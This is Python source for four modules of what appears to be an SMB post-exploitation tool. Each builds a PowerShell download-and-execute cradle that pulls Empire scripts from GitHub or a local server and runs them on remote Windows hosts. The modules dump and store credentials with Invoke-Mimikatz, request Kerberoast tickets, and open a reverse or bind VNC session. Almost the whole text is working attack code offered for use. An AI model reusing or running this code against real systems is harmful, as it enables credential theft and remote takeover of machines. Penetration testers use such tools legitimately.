def run(self, target, args, smb_con, loggers, config_obj):
logger = loggers['console']
timeout = args.timeout
loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Attempting Invoke-Mimikatz'])
try:
# Define Script Source
if args.fileless:
srv_addr = get_local_ip()
script_location = 'http://{}/Invoke-Mimikatz.ps1'.format(srv_addr)
setattr(args, 'timeout', timeout + 60)
else:
script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1'
setattr(args, 'timeout', timeout + 25)
logger.debug('Script source: {}'.format(script_location))
# Setup PS1 Script
cmd = """Invoke-Mimikatz -Command \"{}\"""".format(self.args['COMMAND']['Value'])
launcher = powershell.gen_ps_iex_cradle(script_location, cmd)
try:
# Execute
cmd = powershell.create_ps_command(launcher, loggers['console'], force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=smb_con.os)
results = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True)
# Display Output
if not results:
loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), 'No output returned'])
return
elif args.debug:
for line in results.splitlines():
loggers['console'].debug([smb_con.host, smb_con.ip, self.name.upper(), line])
# Parse results and send creds to db
db_updates = 0
for cred in self.parse_mimikatz(results):
if cred[0] == "hash":
smb_con.db.update_user(cred[2], '', cred[1], cred[3])
loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(),"{}\\{}:{}".format(cred[1],cred[2],cred[3])])
db_updates += 1
elif cred[0] == "plaintext":
smb_con.db.update_user(cred[2], cred[3], cred[1], '')
loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(),"{}\\{}:{}".format(cred[1], cred[2], cred[3])])
db_updates += 1
loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "{} credentials updated in database".format(db_updates)])
# write results to file
file_name = 'mimikatz_{}_{}.txt'.format(target, get_filestamp())
tmp_logger = setup_file_logger(args.workspace, file_name, ext='')
tmp_logger.info(results)
loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "Output saved to: {}".format(file_name)])
except Exception as e:
if str(e) == "list index out of range":
loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), "{} failed".format(self.name)])
else:
loggers['console'].fail([smb_con.host, smb_con.ip, self.name.upper(), str(e)])
except Exception as e:
logger.debug("{} Error: {}".format(self.name, str(e)))
def run(self, target, args, smb_con, loggers, config_obj):
logger = loggers['console']
timeout = args.timeout
loggers['console'].info([
smb_con.host, smb_con.ip,
self.name.upper(), 'Attempting Invoke-Kerberoast'
])
try:
# Define Script Source
if args.fileless:
srv_addr = get_local_ip()
script_location = 'http://{}/Invoke-Kerberoast.ps1'.format(
srv_addr)
setattr(args, 'timeout', timeout + 30)
else:
script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1'
setattr(args, 'timeout', timeout + 15)
logger.debug('Script source: {}'.format(script_location))
# Setup PS1 Script
launcher = powershell.gen_ps_iex_cradle(script_location, '')
# Execute
cmd = powershell.create_ps_command(launcher,
loggers['console'],
force_ps32=args.force_ps32,
no_obfs=args.no_obfs,
server_os=smb_con.os)
x = code_execution(smb_con,
args,
target,
loggers,
config_obj,
cmd,
return_data=True)
# Display Output
for line in x.splitlines():
loggers['console'].success(
[smb_con.host, smb_con.ip,
self.name.upper(), line])
# write results to file
file_name = 'kerberoast_{}_{}.txt'.format(target, get_filestamp())
tmp_logger = setup_file_logger(args.workspace, file_name, ext='')
tmp_logger.info(x)
loggers['console'].info([
smb_con.host, smb_con.ip,
self.name.upper(), "Output saved to: {}".format(file_name)
])
except Exception as e:
logger.debug("{} Error: {}".format(self.name, str(e)))
def run(self, target, args, smb_con, loggers, config_obj):
cmd = ''
logger = loggers['console']
timeout = args.timeout
loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Attempting Invoke-VNC'])
try:
# Define Script Source
if args.fileless:
srv_addr = get_local_ip()
script_location = 'http://{}/Invoke-Vnc.ps1'.format(srv_addr)
setattr(args, 'timeout', timeout + 30)
else:
script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/management/Invoke-Vnc.ps1'
setattr(args, 'timeout', timeout + 15)
logger.debug('Script source: {}'.format(script_location))
# Setup PS1 Script
if self.args['CONTYPE']['Value'] == 'reverse':
if not self.args['IPADDRESS']['Value']:
self.args['IPADDRESS']['Value'] = get_local_ip()
cmd = """Invoke-Vnc -ConType reverse -IpAddress {} -Port {} -Password {}""".format(self.args['IPADDRESS']['Value'],self.args['PORT']['Value'],self.args['PASSWORD']['Value'])
elif self.args['CONTYPE']['Value'] == 'bind':
cmd = """Invoke-Vnc -ConType bind -Port {} -Password {}""".format(self.args['PORT']['Value'],self.args['PASSWORD']['Value'])
else:
loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(), "Invalid CONTYPE"])
exit(1)
launcher = powershell.gen_ps_iex_cradle(script_location, cmd)
# Execute
cmd = powershell.create_ps_command(launcher, loggers['console'], force_ps32=args.force_ps32, no_obfs=args.no_obfs, server_os=smb_con.os)
x = code_execution(smb_con, args, target, loggers, config_obj, cmd, return_data=True)
# Display Output
if not x.startswith('Code execution failed'):
for line in x.splitlines():
loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), line])
else:
loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), "Command execute with no output"])
except Exception as e:
logger.debug("{} Error: {}".format(self.name, str(e)))
def run(self, target, args, smb_con, loggers, config_obj):
logger = loggers['console']
try:
# Get script:
if args.fileless:
srv_addr = get_local_ip()
script_location = 'http://{}/Invoke-Mimikatz.ps1'.format(srv_addr)
else:
script_location = 'https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1'
logger.debug('Fetching script from {}'.format(script_location))
# Setup
timeout = args.timeout
setattr(args, 'timeout', timeout+10) # Modify timeout to allow execution time
cmd = """Invoke-Mimikatz -Command \"{}\"""".format(self.args['COMMAND']['Value'])
launcher = powershell.gen_ps_iex_cradle(script_location, cmd)
try:
# Execute
cmd = powershell.create_ps_command(launcher, loggers['console'], force_ps32=args.force_ps32, obfs=args.obfs, server_os=smb_con.os)
loggers['console'].info([smb_con.host, smb_con.ip, self.name.upper(), 'Attempting Invoke-Mimikatz'])
x = code_execution(smb_con, args, target, loggers, config_obj, cmd=cmd, return_data=True)
# Display Output
for line in x.splitlines():
loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(), line])
# Parse results and send creds to db
db_updates = 0
for cred in self.parse_mimikatz(x):
if cred[0] == "hash":
smb_con.db.update_user(cred[2], '', cred[1], cred[3])
db_updates += 1
elif cred[0] == "plaintext":
smb_con.db.update_user(cred[2], cred[3], cred[1], '')
db_updates += 1
loggers['console'].success([smb_con.host, smb_con.ip, self.name.upper(), "{} credentials updated in database".format(db_updates)])
except Exception as e:
loggers['console'].debug([smb_con.host, smb_con.ip, self.name.upper(), str(e)])
except Exception as e:
logger.debug("{} Error: {}".format(self.name, str(e)))